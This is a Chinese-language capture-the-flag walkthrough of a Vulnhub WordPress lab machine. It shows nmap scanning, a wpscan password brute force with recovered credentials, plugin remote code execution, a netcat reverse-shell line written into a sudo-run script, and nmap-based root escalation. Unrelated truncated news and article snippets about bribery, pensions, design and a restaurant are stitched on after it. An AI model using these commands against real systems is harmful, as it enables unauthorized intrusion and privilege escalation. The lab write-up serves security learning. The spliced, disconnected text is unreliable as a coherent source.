Vulnhub提示:
扫描靶机IP地址:nmap -sP 192.168.10.0/24
扫描端口信息:nmap -sV -p 1-65535 -A 192.168.10.129
开放端口22,80
访问80端口发现URL被重定向到wordy
我们需要在host文件中添加
文件位置 /etc/hosts
可以访问到啦
扫描下目录结构吧,
御剑扫描
发现是wordpress站点
使用WPscan扫描
一款专注于wordpress站点扫描工具
wpscan -url wordy
顺便枚举一下用户
站点没发现什么漏洞,暴力破解尝试下
root@kali:~# wpscan --url wordy --enumerate u -P /usr/share/wordlists/rockyou.txt
破解很久没获取密码,这时候想起Vulnhub重要提示
root@kali:~# cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
使用这个字典在尝试下暴力破解
root@kali:~# wpscan --url wordy --enumerate u -P /root/passwords.txt
获得密码
mark
helpdesk01
登录后台发现Activity on Wordy插件存在远程代码执行漏洞
利用远程代码执行命令漏洞步骤:
step1:打开burpsuite工具设置 ***
step2:
step3:发送到重写模块
step4:kali打开端口监听
step5:利用成功获取到webshell
横向移动搜寻可以利用的信息
成功找到了graham的密码信息
查看graham用户的sudo -l 权限,可以以jens 用户权限执行backups.sh脚本
如果以jens身份执行反弹shell脚本,反弹回的则是jens用户的shell
echo “ nc -e /bin/bash 192.168.10.155 8888 " > backups.sh
kali 端监听 8888 端口
sudo -u jens 以jens用户执行脚本,不加-u 则默认以root权限执行,那样当然是不能成功的
jens用户可以以 root权限执行 nmap nmap 提权分为两种
旧版本上以进入交互提权
# 进入nmap的交互模式 nmap --interactive # 执行sh,提权成功 !sh
新版本
echo 'os.execute("/bin/sh")' >/tmp/TF
sudo nmap --script=/tmp/TF
SEC是在2013年认为Juniper Networks违反《反海外贿赂法》(Foreign Corrupt Practices Act,FCPA)而针对该公司展开调查,指出其俄罗斯分公司JN...
“非常感谢提交漏洞和对XXXX的支持,我们已第一时间将漏洞修复完毕,并抓捕了你”。看过这么一句话,你会不会莞尔一笑?对了,还有一条表情包的内容是这样的“我有乌云保护,日你网站怎么了,不仅日你网站还拖你...
智能机器人会给人类带来什么? 1、(1)失业:随着人工智能技术的发展,越来越多的工作可能会被机器人或自动化工具所取代,导致大量人员失业。(2)隐私泄露:人工智能技术可能会通过分析、收集和处理个人数据来...
编辑导读:作为一个设计师,需要站在用户的角度思考问题,相识用户真实的需求。我们需要用到一个很是有用的观念,心智模子。本文作者将环绕此举办六个方面的阐明,但愿对你有辅佐。 本日,我们来聊点纷歧样的对象...
进入信息时代,人们彼此之间的信息交换变得更加高效、便捷。基于此,餐饮市场中的各品牌,从以往单纯的品牌营销渐渐转型至打造良好的市场口碑。上尊法式铁板烧作为新兴的时尚餐饮品牌,在此方面表现突出。其聪明之处...
中新网客户端北京8月4日电(记者 李金磊)2020年养老金上涨已经结束,截至目前,全国31省份均已上调2020年养老金。你到手的养老金涨了多少钱? 31省份养老金调整方案确定 今年4月份,人社部、...